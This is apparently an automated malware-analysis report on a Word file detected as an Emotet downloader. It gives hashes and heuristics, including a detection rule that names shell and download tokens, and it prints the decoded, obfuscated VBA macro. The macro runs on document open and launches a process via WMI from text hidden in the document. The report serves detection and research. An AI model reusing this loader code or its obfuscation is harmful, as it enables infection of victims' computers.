Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 33d53b355c1c8ff7…

MALICIOUS

Office (OLE)

157.3 KB Created: 2021-01-12 14:56:00 Authoring application: Microsoft Office Word First seen: 2021-02-20
MD5: 59311f645c551a82191f9c44af654876 SHA-1: d0250a75d8f11b6b1d367c9e41368708c191bd4c SHA-256: 33d53b355c1c8ff73f38dd79b21d6264ca7b549ef04fb4d253a5d6396fab2615
172 Risk Score

Heuristics 7

  • ClamAV: Doc.Downloader.EmotetRed02224-9938637-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.EmotetRed02224-9938637-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set Tx527vhwo2t8f = CreateObject(Ccwarym3vj03kce9)
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Private Sub Document_open()
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 7306 bytes
SHA-256: cd2cdccd599e42cfa9fbd13cb834d7d13272d1d23a56e4724093d32e3972c403
Detection
ClamAV: No threats found
Obfuscation or payload: likely
64 of 122 identifiers look randomly generated (e.g. 'Gd6tg8elqhltp41ulx') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Ut2r21ym17z8"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
Rvbcusut6emx
End Sub

Attribute VB_Name = "L95wkirc_zm"
    

Attribute VB_Name = "Wnoyuuu28ekk6591v"
Function Rvbcusut6emx()
On Error Resume Next
Kcrzazn3nba1w_cbo = Mudv4xgi6y7p
dsfe = Y5bloykz5698et6 + Ut2r21ym17z8.StoryRanges(wdMainTextStory) + A64w5ib25j6s36z79
   GoTo kJLlUyR
Set LLIuCIBBB = qspTA
    Dim IXWSCCJ As Double
    IXWSCCJ = Fix(kJLlUyR)
    If IXWSCCJ <> kJLlUyR Then Exit Function
    Dim dFxICEjw As Double
    dFxICEjw = IXWSCCJ ^ (1 / 3)
    If Fix(dFxICEjw) ^ 3 = IXWSCCJ Then
        zmkyT = True
    ElseIf (Fix(dFxICEjw) + 1) ^ 3 = IXWSCCJ Then
        zmkyT = True
    End If
kJLlUyR:
g42 = "w]xm[vpw]xm[v"
M4678w8zpmchehsiki = "w]xm[vrow]xm[vw]xm[vcew]xm[vsw]xm[vsw]xm[vw]xm[v"
   GoTo oXEtI
Set RfdoD = lQgtJ
    Dim NgFCwDc As Double
    NgFCwDc = Fix(oXEtI)
    If NgFCwDc <> oXEtI Then Exit Function
    Dim wBPVCHmC As Double
    wBPVCHmC = NgFCwDc ^ (1 / 3)
    If Fix(wBPVCHmC) ^ 3 = NgFCwDc Then
        pOJMnADCJ = True
    ElseIf (Fix(wBPVCHmC) + 1) ^ 3 = NgFCwDc Then
        pOJMnADCJ = True
    End If
oXEtI:
Vivyln4bl6peyh = "w]xm[v:ww]xm[vw]xm[vinw]xm[v3w]xm[v2w]xm[v_w]xm[v"
   GoTo gGWPAaQE
Set RMuSICrX = MzYdG
    Dim IFSjFIkG As Double
    IFSjFIkG = Fix(gGWPAaQE)
    If IFSjFIkG <> gGWPAaQE Then Exit Function
    Dim KAAvICJ As Double
    KAAvICJ = IFSjFIkG ^ (1 / 3)
    If Fix(KAAvICJ) ^ 3 = IFSjFIkG Then
        ammiJ = True
    ElseIf (Fix(KAAvICJ) + 1) ^ 3 = IFSjFIkG Then
        ammiJ = True
    End If
gGWPAaQE:
Re7_zgy8m2ij4x3e9a = "ww]xm[vinw]xm[vmw]xm[vgmw]xm[vtw]xm[vw]xm[v"
   GoTo iMCSwT
Set rxeqDoVb = qsfzvZAB
    Dim RiwhJ As Double
    RiwhJ = Fix(iMCSwT)
    If RiwhJ <> iMCSwT Then Exit Function
    Dim QiUwq As Double
    QiUwq = RiwhJ ^ (1 / 3)
    If Fix(QiUwq) ^ 3 = RiwhJ Then
        QhiuG = True
    ElseIf (Fix(QiUwq) + 1) ^ 3 = RiwhJ Then
        QhiuG = True
    End If
iMCSwT:
Ydortovj0ize4kyb43 = "w]xm[vw]xm[v" + Mid(Application.Name, 4 + 2, 2 - 1) + "w]xm[vw]xm[v"
   GoTo syZqCACD
Set Deywj = RYasHk
    Dim bdthsD As Double
    bdthsD = Fix(syZqCACD)
    If bdthsD <> syZqCACD Then Exit Function
    Dim iBHSjSEa As Double
    iBHSjSEa = bdthsD ^ (1 / 3)
    If Fix(iBHSjSEa) ^ 3 = bdthsD Then
        kamgFA = True
    ElseIf (Fix(iBHSjSEa) + 1) ^ 3 = bdthsD Then
        kamgFA = True
    End If
syZqCACD:
Gfqkpxn1x_fklh0 = Re7_zgy8m2ij4x3e9a + Ydortovj0ize4kyb43 + Vivyln4bl6peyh + g42 + M4678w8zpmchehsiki
   GoTo tjEOD
Set CsYsXv = GbHdGd
    Dim EhgwMQ As Double
    EhgwMQ = Fix(tjEOD)
    If EhgwMQ <> tjEOD Then Exit Function
    Dim QvXuJE As Double
    QvXuJE = EhgwMQ ^ (1 / 3)
    If Fix(QvXuJE) ^ 3 = EhgwMQ Then
        KFoRcFUC = True
    ElseIf (Fix(QvXuJE) + 1) ^ 3 = EhgwMQ Then
        KFoRcFUC = True
    End If
tjEOD:
Ccwarym3vj03kce9 = O9o8x19hao7d2(Gfqkpxn1x_fklh0)
   GoTo BcbiEV
Set euEPorCJT = ZDZjIB
    Dim aENWC As Double
    aENWC = Fix(BcbiEV)
    If aENWC <> BcbiEV Then Exit Function
    Dim FqraEHXFK As Double
    FqraEHXFK = aENWC ^ (1 / 3)
    If Fix(FqraEHXFK) ^ 3 = aENWC Then
        UTgTA = True
    ElseIf (Fix(FqraEHXFK) + 1) ^ 3 = aENWC Then
        UTgTA = True
    End If
BcbiEV:
Set Tx527vhwo2t8f = CreateObject(Ccwarym3vj03kce9)
   GoTo HqDzXCHAl
Set UCwnFlrZJ = HCvew
    Dim ZWQKFHwJE As Double
    ZWQKFHwJE = Fix(HqDzXCHAl)
    If ZWQKFHwJE <> HqDzXCHAl Then Exit Function
    Dim PQQqeFIV As Double
    PQQqeFIV = ZWQKFHwJE ^ (1 / 3)
    If Fix(PQQqeFIV) ^ 3 = ZWQKFHwJE Then
        pBfoEG = True
    ElseIf (Fix(PQQqeFIV) + 1) ^ 3 = ZWQKFHwJE Then
        pBfoEG = True
    End If
HqDzXCHAl:
   GoTo ZtkoHFBJE
Set gpMvF = cFNuGfA
    Dim ZJaTECrE As Double
    ZJaTECrE = Fix(ZtkoHFBJE)
    If ZJaTECrE <> ZtkoHFBJE Then Exit Function
    Dim BXAuAz As Double
    BXAuAz = ZJaTECrE ^ (1 / 3)
    If Fix(BXAuAz) ^ 3 = ZJaTECrE Then
        VDgoIuF = True
    ElseIf (Fix(BXAuAz) + 1) ^ 3 = ZJaTECrE Then
        VDgoIuF = True
    End If
ZtkoHFBJE:
   GoTo VjnuHqF
Set LFWNyIzJD = WLUaHmEM
    Dim XulhC As Double
    XulhC = Fix(VjnuHqF)
    If XulhC <> VjnuHqF Then Exit Function
    Dim vZKQBuM As Double
    vZKQBuM = XulhC ^ (1 / 3)
    If Fix(vZKQBuM) ^ 3 = XulhC Then
        JYGXBIlF = True
    ElseIf (Fix(vZKQBuM) + 1) ^ 3 = XulhC Then
        JYGXBIlF = True
    End If
VjnuHqF:
Tx527vhwo2t8f.Create O9o8x19hao7d2(Mid(dsfe, (1 + 4), Len(dsfe))), B7vzyodqxzgzye, T_5ge0cx2v7ltggvjl
   GoTo haldI
Set mtEnt = eIaaFZ
    Dim dLkMB As Double
    dLkMB = Fix(haldI)
    If dLkMB <> haldI Then Exit Function
    Dim NRQDYIEuB As Double
    NRQDYIEuB = dLkMB ^ (1 / 3)
    If Fix(NRQDYIEuB) ^ 3 = dLkMB Then
        nqWzNZ = True
    ElseIf (Fix(NRQDYIEuB) + 1) ^ 3 = dLkMB Then
        nqWzNZ = True
    End If
haldI:
   GoTo wqynHT
Set nDoEDU = HlSCAZ
    Dim gdhXNEq As Double
    gdhXNEq = Fix(wqynHT)
    If gdhXNEq <> wqynHT Then Exit Function
    Dim hqoyYzBsF As Double
    hqoyYzBsF = gdhXNEq ^ (1 / 3)
    If Fix(hqoyYzBsF) ^ 3 = gdhXNEq Then
        ZPIhEMFUB = True
    ElseIf (Fix(hqoyYzBsF) + 1) ^ 3 = gdhXNEq Then
        ZPIhEMFUB = True
    End If
wqynHT:
End Function
Function O9o8x19hao7d2(Ky3nrnpvhpdr)
On Error Resume Next
   GoTo wKzNWHJF
Set prYcEiJ = IdwoCFMGd
    Dim GyqdfE As Double
    GyqdfE = Fix(wKzNWHJF)
    If GyqdfE <> wKzNWHJF Then Exit Function
    Dim qomwTEIy As Double
    qomwTEIy = GyqdfE ^ (1 / 3)
    If Fix(qomwTEIy) ^ 3 = GyqdfE Then
        SBHKCG = True
    ElseIf (Fix(qomwTEIy) + 1) ^ 3 = GyqdfE Then
        SBHKCG = True
    End If
wKzNWHJF:
Tqk2stc0yhg_4jf = Ky3nrnpvhpdr
   GoTo KVceECFW
Set jSHOJAlCH = SyFFGiI
    Dim NHXknCOIO As Double
    NHXknCOIO = Fix(KVceECFW)
    If NHXknCOIO <> KVceECFW Then Exit Function
    Dim DFJhGAS As Double
    DFJhGAS = NHXknCOIO ^ (1 / 3)
    If Fix(DFJhGAS) ^ 3 = NHXknCOIO Then
        IRzIEJEhH = True
    ElseIf (Fix(DFJhGAS) + 1) ^ 3 = NHXknCOIO Then
        IRzIEJEhH = True
    End If
KVceECFW:
Vs2ssn0bn7sfqy0gs_ = Jkjaruxs2sfkcu(Tqk2stc0yhg_4jf)
   GoTo GXOzFr
Set LVentAcm = DFUrCC
    Dim bmEDqv As Double
    bmEDqv = Fix(GXOzFr)
    If bmEDqv <> GXOzFr Then Exit Function
    Dim euCMS As Double
    euCMS = bmEDqv ^ (1 / 3)
    If Fix(euCMS) ^ 3 = bmEDqv Then
        LiKWuj = True
    ElseIf (Fix(euCMS) + 1) ^ 3 = bmEDqv Then
        LiKWuj = True
    End If
GXOzFr:
O9o8x19hao7d2 = Vs2ssn0bn7sfqy0gs_
   GoTo OBHkWHOT
Set sjOmJFFlU = jEfqBuNJA
    Dim bmUbGyE As Double
    bmUbGyE = Fix(OBHkWHOT)
    If bmUbGyE <> OBHkWHOT Then Exit Function
    Dim AmBRDm As Double
    AmBRDm = bmUbGyE ^ (1 / 3)
    If Fix(AmBRDm) ^ 3 = bmUbGyE Then
        KKUcJE = True
    ElseIf (Fix(AmBRDm) + 1) ^ 3 = bmUbGyE Then
        KKUcJE = True
    End If
OBHkWHOT:
End Function
Function Jkjaruxs2sfkcu(Gd6tg8elqhltp41ulx)
Jkjaruxs2sfkcu = Replace(Gd6tg8elqhltp41ulx, "w]xm[v", P04emo8yv2ao3jy8)
End Function

Open this report in the interactive analyzer, or submit your own file for analysis.